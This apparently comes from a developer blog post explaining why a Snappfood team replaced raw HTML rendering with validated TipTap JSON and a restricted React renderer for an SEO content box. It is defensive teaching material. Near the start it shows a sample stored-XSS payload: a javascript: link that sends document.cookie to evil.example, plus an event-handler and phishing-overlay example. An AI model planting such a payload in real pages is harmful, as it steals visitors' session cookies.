One thing I have been thinking about recently is how a seemingly simple content feature can quietly become a security and architecture decision.
The requirement sounds harmless:
An internal team writes rich content in a backoffice, an API returns it, and the frontend renders it on customer pages.
We needed something similar at Snappfood for an SEO content box. The content had to support paragraphs, headings, lists, bold text, and links. It also had to be rendered server-side so search engines could index it.
The obvious implementation looked like this:
function SeoBox({ html }: { html: string }) {
return <div dangerouslySetInnerHTML={{ __html: html }} />
}
It is only one line of code.
But that line changes the meaning of the API response. It is no longer just data. It can become instructions for the browser.
And that is where the real problem starts.
The API boundary is not a trust boundary
It is tempting to think the HTML is safe because it comes from our own API or because only backoffice users can edit it.
But internal content is still input.
An account can be compromised. A permission can be configured incorrectly. A migration script can copy unsafe content. Another service can write directly to the database. And a harmless-looking editor change can start preserving attributes that the frontend never expected.
If the content is stored and later rendered for every visitor, a single bad value becomes stored XSS.
For example:
<a href="javascript:fetch('//evil.example?c='+document.cookie)">
Special offer
</a>
<p onmouseover="stealUserData()">Move your mouse here</p>
<div style="position:fixed;inset:0;z-index:9999">
Fake login form
</div>
The impact is not limited to showing an alert box. Depending on the application, injected content can:
- perform actions as the signed-in user
- read data available to JavaScript and send it elsewhere
- replace part of the page with a phishing UI
- redirect users to spam or malicious websites
- damage SEO through injected links or hidden content
- break the layout or create server/client hydration mismatches
On a large product, the blast radius matters. One backoffice entry may be rendered on the web, PWA, Android, and iOS surfaces, and seen by thousands of users before anyone notices.
The problem is not that the API is external.
The problem is that we gave a string the authority to create browser behavior.
Allowing only a few tags is not enough
The first solution many teams consider is a tag allowlist:
p, h2, h3, ul, ol, li, b, em, a
That is a good start, but most of the interesting risk is not in the tag name. It is in the attributes and their values.
An <a> element may be allowed, but should its href accept javascript:? Should it accept a protocol-relative URL such as //evil.example? Should arbitrary style, class, id, or event attributes survive?
Every allowed element creates another set of questions:
- Which attributes are valid?
- Which URL protocols and domains are valid?
- Can CSS hide or cover trusted UI?
- Can the content load remote resources?
- What happens when malformed markup reaches SSR?
This is why a regular expression or a home-grown HTML parser is not a security solution. Browsers parse HTML in complicated ways, and the edge cases evolve.
Option 1: Keep HTML, but sanitize it correctly
Sometimes HTML really is the right content format. Maybe you already have years of HTML content, need high authoring flexibility, or integrate with a system that only produces HTML.
In that case, use a maintained sanitizer such as DOMPurify or sanitize-html. Do not build one yourself.
A serious configuration needs to define at least:
- allowed tags
- allowed attributes for each tag
- allowed URL schemes and hosts
- treatment of inline styles, images, iframes, and SVG
- where sanitization runs and how often it runs
It should also be tested with malicious payloads, not only valid editor output.
Sanitization is a valid defense, but it creates an ongoing responsibility:
- the sanitizer must stay patched
- backend and frontend rules must not drift apart
- content must not be mutated after sanitization
- every place that renders the HTML must use the same policy
A strict Content Security Policy and Trusted Types can reduce the impact of mistakes, but they are additional layers, not replacements for safe rendering. The OWASP XSS Prevention Cheat Sheet makes the same point: no single control solves every XSS problem.
For us, the more useful question became:
Do we need to accept HTML at all?
Option 2: Store content as structured data
Our content requirements were intentionally small:
- paragraphs
- level-two and level-three headings
- ordered and unordered lists
- bold and italic text
- links
- line breaks
We did not need arbitrary HTML. We needed a small document model.
So instead of storing an HTML string, we chose a TipTap/ProseMirror JSON document:
{
"type": "doc",
"content": [
{
"type": "heading",
"attrs": { "level": 2 },
"content": [
{ "type": "text", "text": "Order pizza online in Tehran" }
]
},
{
"type": "paragraph",
"content": [
{ "type": "text", "text": "Choose from " },
{
"type": "text",
"text": "hundreds of restaurants",
"marks": [{ "type": "bold" }]
}
]
}
]
}
The frontend maps each known node to a component:
function renderNode(node: SeoNode, key: number): React.ReactNode {
const children = node.content?.map(renderNode)
switch (node.type) {
case 'text':
return renderText(node, key)
case 'paragraph':
return <Text key={key} as="p">{children}</Text>
case 'heading':
return (
<Text key={key} as={node.attrs?.level === 3 ? 'h3' : 'h2'}>
{children}
</Text>
)
case 'bulletList':
return <ul key={key}>{children}</ul>
case 'orderedList':
return <ol key={key}>{children}</ol>
case 'listItem':
return <li key={key}>{children}</li>
case 'hardBreak':
return <br key={key} />
default:
return null
}
}
No HTML string is parsed in the browser.
Text stays a React string, so React escapes it. A paragraph can only become our paragraph component. A heading can only become h2 or h3. An unknown node produces nothing instead of creating an unknown DOM element.
This is an important distinction:
JSON is not automatically safe. It becomes safe when the schema is validated and the renderer gives it only a small, explicit set of capabilities.
Links need their own security policy
Even with structured content, links are still an escape hatch.
We decided that a link may be:
- a relative path such as
/discounts - an HTTPS URL on
snappfood.iror one of its subdomains
Everything else is rejected.
export function isAllowedHref(value?: string) {
if (!value) return false
if (
value.startsWith('/') &&
!value.startsWith('//') &&
!value.includes('\\')
) {
return true
}
try {
const url = new URL(value)
return (
url.protocol === 'https:' &&
(url.hostname === 'snappfood.ir' ||
url.hostname.endsWith('.snappfood.ir'))
)
} catch {
return false
}
}
Internal links become the application's Link component. If external links are allowed in another use case, they should receive an explicit policy such as rel="nofollow noopener".
The useful principle here is to validate the meaning of an attribute, not only its type. href being a string tells us almost nothing about whether it is safe.
We enforce the contract in three places
The design became much stronger when we stopped treating validation as one team's job.
1. The editor limits what authors can create
The backoffice uses TipTap with only the extensions we support. It saves editor.getJSON(), not editor.getHTML().
Pasted content is converted into the small document model. Unsupported tags and attributes are not part of the saved contract.
2. The backend treats the editor as untrusted
The backend validates every document against the same ProseMirror schema, checks its structure, checks every link, and rejects invalid content with a 400 response.
It also stores metadata such as version, updatedBy, and updatedAt. Security includes knowing which format we are reading and being able to trace how content changed.
3. The frontend remains restrictive
The renderer handles only known nodes and marks. Unknown content is dropped. It uses design-system components and fixed semantic elements instead of accepting arbitrary tag names or attributes.
This gives us defense in depth:
Backoffice constraints -> Backend validation -> Restricted renderer
If one layer makes a mistake, the next layer still has a chance to stop it.
What this solved beyond XSS
Security was the reason to question raw HTML, but structured content also improved other parts of the system.
The output always uses our design system. Authors cannot introduce random margins, colors, or inline styles. The markup stays semantic and predictable for SEO. A malformed closing tag cannot break the surrounding page. And we can change how a bold mark renders without migrating every stored document.
It also creates a clean path for future domain-specific blocks.
For example, we may later add a faq node that renders visible content and generates FAQPage JSON-LD. That behavior would be implemented and reviewed once, rather than manually recreated in many HTML strings.
The trade-off is less freedom
Structured content is not free.
It requires more work at the beginning:
- an editor configuration
- a shared schema
- backend validation
- a renderer
- migration for existing HTML
Content authors can use only the blocks the product supports. Adding a table or an image is no longer “just paste this HTML.” It becomes a small product and engineering decision across the editor, API, validation, rendering, accessibility, and responsive design.
For our use case, that limitation was a feature.
The SEO team needed predictable rich text, not the full power of the browser.
Tools and when I would use them
The choice is not “one library for every case.” It depends on the content boundary.
- DOMPurify: A strong choice when untrusted HTML must be rendered in a browser. Keep it updated and configure it deliberately.
- sanitize-html: Useful for server-side Node.js pipelines where tags, attributes, and URL schemes need a clear allowlist.
- TipTap / ProseMirror: Useful when authors need rich-text editing but the application wants a strict, structured document model. TipTap also recommends JSON for persistence.
-
@tiptap/static-renderer: Can render TipTap JSON to HTML or React without an editor instance. For our small set of nodes, a hand-written renderer was easier to audit and avoided adding more runtime dependencies. If the content model grows, this decision may change. - CSP and Trusted Types: Valuable defense-in-depth controls for limiting dangerous DOM sinks and reducing the impact of an XSS mistake.
If I had to keep HTML, I would sanitize it with a well-maintained library, define one shared policy, test it with hostile input, and add browser-level controls.
If the product needs only a small set of content capabilities, I would prefer structured data and a controlled renderer.
The tests should describe the threat model
We plan to test the content system with input that includes:
-
<script>elements - event handlers such as
onclick -
javascript:links - protocol-relative links such as
//evil.example - unknown nodes and marks
- invalid heading levels
- deeply nested or oversized documents
- API failures and invalid payloads
The important assertion is not only “validation returns false.”
It is:
Nothing executable reaches the rendered page, and invalid content never breaks the customer experience.
If fetching or validating the SEO content fails, the page should render without the box. Optional content should not take the main product down with it.
The biggest lesson for me was that rendering HTML from an API is not a frontend shortcut. It is a decision about what capabilities we give to content and how far we allow those capabilities to travel through the system.
Sometimes sanitized HTML is the right decision.
For our SEO content box at Snappfood, structured JSON with a restricted renderer gave us a smaller attack surface, stronger design consistency, and a clearer contract between the backoffice, backend, and frontend.
The implementation was more work than one line of dangerouslySetInnerHTML.
But the system became much easier to reason about.
I would love to hear your experience:
How does your team render rich content from APIs?
Do you sanitize HTML, use a structured document model, or combine both?
Top comments (1)
Thanks for your insightful content!